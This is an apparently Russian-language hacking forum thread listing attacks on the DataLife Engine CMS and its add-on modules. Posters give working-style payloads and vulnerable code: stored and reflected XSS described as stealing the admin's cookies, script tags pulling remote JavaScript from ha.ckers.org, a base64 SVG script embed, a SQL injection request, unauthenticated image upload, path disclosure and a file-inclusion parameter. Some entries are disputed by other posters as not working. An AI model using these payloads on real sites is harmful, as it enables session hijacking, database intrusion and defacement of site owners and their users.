[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    hacking attemptz
    Версия: v.1.0


    Активная XSS от любого пользователя(100% кража куки админа)

    Уязвимый скрипт: hacking_attemptz_fnct.php
    Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234
    Метод: POST
    Уязвимый кусок кода:
    PHP:
    function log_user($host)
       {
          global 
    $ip;
             
    $log_date date('d.m.Y');
             
    $log_time date('H:i:s');
          
    $log_info "

    <tr>
     <td align='center'>"
    .$_POST['login_name']."</td>
     <td align='center'>
    $log_date</td>
     <td align='center'>
    $log_time</td>
     <td align='center'>
    $ip</td>
     <td align='center'>"
    .gethostbyaddr($ip)."</td>
    </hr>
    "
    ;
    Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом!
    Смотрим админку, и вот! XSS видна
     
    1 person likes this.
  2. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Что значит возможно?
     
  3. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    Friends of Suite
    Версия: v.1.3


    Расскрытие путей

    Уязвимый скрипт: inc/friend.php
    Запрос: reg_name[]=123&reg_adress[]=1234
    Метод: POST
    Уязвимый кусок кода:
    PHP:
      if ($_POST['docreate'] == "create")
      {
         
    $name               trim(htmlspecialchars(stripslashes($_POST['name'])));
         
    $address            trim(htmlspecialchars(stripslashes($_POST['address'])));

     
  4. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    Friends of Suite
    Версия: v.1.3


    Активная XSS от любого пользователя(100% кража куки админа)

    Уязвимый скрипт: friend.php
    Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>&reg_adress=http://127.0.0.1/
    Метод: POST
    Уязвимый кусок кода:
    PHP:
    //пока ненашёл...
    Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост.
    Смотрим админку, и вот! XSS видна :p
    Хотя script удаляет...
     
    #44 -Hormold-, 27 Feb 2009
    Last edited: 27 Feb 2009
  5. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    DataLife Engine Redirect
    Версия: v.1.1

    XSS

    Уязвимый скрипт: engine/redirect.php
    Запрос: url=http://site.su"><script>alert(document.cookie);</script>
    Метод: GET
    Уязвимый кусок кода:
    PHP:
    $url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php');


    Переадресация для ссылок(^^ странно похожи...)!
    Версия: v.1.0

    XSS

    Уязвимый скрипт: engine/redikt.php
    Запрос: ?url=http://sasa.su"><script>alert(document.cookie);</script>
    Метод: GET
    Уязвимый кусок кода:
    PHP:
        $url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php');
     
    #45 -Hormold-, 27 Feb 2009
    Last edited: 27 Feb 2009
    1 person likes this.
  6. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    Удаление комментариев при помощи AJAX
    Версия: v.1.0


    sql-inj

    Уязвимый скрипт: engine/ajax/commentdelete.php
    Запрос: commid=-1'
    Метод: GET
    Уязвимый кусок кода:
    PHP:
    $row $db->super_query("SELECT * FROM " PREFIX "_comments where id = '{$_REQUEST['commid']}'");
    Раскручивать не стал...
     
  7. banana

    banana Member

    Joined:
    4 Mar 2009
    Messages:
    22
    Likes Received:
    72
    Reputations:
    18
    По адресу site/engine/images.php?area=
    Можно заливать картинки на сервер без авторизации

    Проверял на 6.7 - пашет
     
    #47 banana, 9 Apr 2009
    Last edited by a moderator: 31 Mar 2010
    5 people like this.
  8. Sosok

    Sosok New Member

    Joined:
    16 Feb 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
    Когда например в гугле воодишь запрос с ковычкой, то при переходе :
    MySQL Error!
    The Error returned was:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
    Error Number:
    1064
     
    1 person likes this.
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    покажи подробнее, линком желательно
     
    5 people like this.
  10. Sosok

    Sosok New Member

    Joined:
    16 Feb 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Вот зайдёшь и на самый первый сайт нажми...
     
    #50 Sosok, 10 May 2009
    Last edited: 10 May 2009
  11. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    565
    Likes Received:
    265
    Reputations:
    17
    там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
     
    3 people like this.
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Активные XSS в DLE версии 8.0 (возможно и раньше).
    Необходимо несколько специфических настроек.

    1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен;
    Простое добавление новостей пользователями, WISYWIG должен быть отключен:

    Code:
    <iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html <
    Code:
    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    
    Code:
    <SCRIPT SRC=http://ha.ckers.org/xss.js?
    <
    2) XSS в комментариях к новостям, WISYWIG должен быть включен:
    Code:
    <SCRIPT SRC=http://ha.ckers.org/xss.js?<
    

    (с) by Wildshaman, 2009 год.
     
    4 people like this.
  13. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    DLE 8.0 Раскрытие путей:
    Code:
    http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
    dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...




    Активная XSS (требуется доступ в админку)...
    идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
    , в поле "Полное имя:" пишем
    Code:
    <script>alert(/Hacked by Wildshaman/)</script>
    и смотрим в свой профиль на сайте ([site]/user/username)



    (с)Wildshaman 2009 год
     
    #53 wildshaman, 11 May 2009
    Last edited: 11 May 2009
    6 people like this.
  14. Genry13

    Genry13 New Member

    Joined:
    19 May 2009
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.

    З.Ы. Такая же "уязвимость" и в приватных месагах.
     
    #54 Genry13, 20 May 2009
    Last edited: 20 May 2009
  15. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =)

    [XSS]
    Code:
    http://test1.ru/dle/<script>alert()</script>?mod=main
    
    Вот еще раскрытие путей если админ не удалил папку Upgrade, достаточно перейти по адресу:
    Code:
    http://test1.ru/dle/upgrade/7.5.php
    
     
    8 people like this.
  16. James026

    James026 New Member

    Joined:
    21 Jan 2009
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    Hacking attempt!
     
  17. Useroff

    Useroff Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    146
    Likes Received:
    27
    Reputations:
    -3
    Создадим новость и потом откроем код страницы с новостью то получим адресс одминки xD

    Code:
    <a onclick="return dropdownmenu(this, event, MenuNewsBuild('1', 'full'), '170px')" href="http://site.ru/odmin.php?mod=editnews&amp;action=editnews&amp;id=1" target = "_blank" >
    Работает не всегда, смотря от настроек DLE.
     
    #57 Useroff, 28 Jul 2009
    Last edited: 28 Jul 2009
  18. -=BlackSmoke=-

    -=BlackSmoke=- New Member

    Joined:
    5 Aug 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Уязвимость в скрипте: DLE FORUM.
    Версии: хз, тестил на 2.3.
    Что делает: получение префикса таблиц(dle_ или то, что задал админ, например, blablabla_).
    Реализация: добавить сообщение, содержащее тег а затем, не обновляя страницу, добавить еще одно сообщение. Появится ошибка синтаксиса мускула, при этом откроется, какую именно таблицу не удалось обновить.
     
    #58 -=BlackSmoke=-, 13 Aug 2009
    Last edited: 21 Aug 2009
    4 people like this.
  19. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    DataLife Engine 8.2

    www.site/path/engine/api/api.class.php?dle_config_api=[file]
     
    #59 InFlame, 5 Sep 2009
    Last edited: 5 Sep 2009
  20. Dr.Brain

    Dr.Brain Banned

    Joined:
    4 Sep 2009
    Messages:
    6
    Likes Received:
    16
    Reputations:
    0
    DataLife Engine 8.2

    www.site/path /engine/api/api.class.php?dle_config_api=[file]

    ниче не вижу
     
    2 people like this.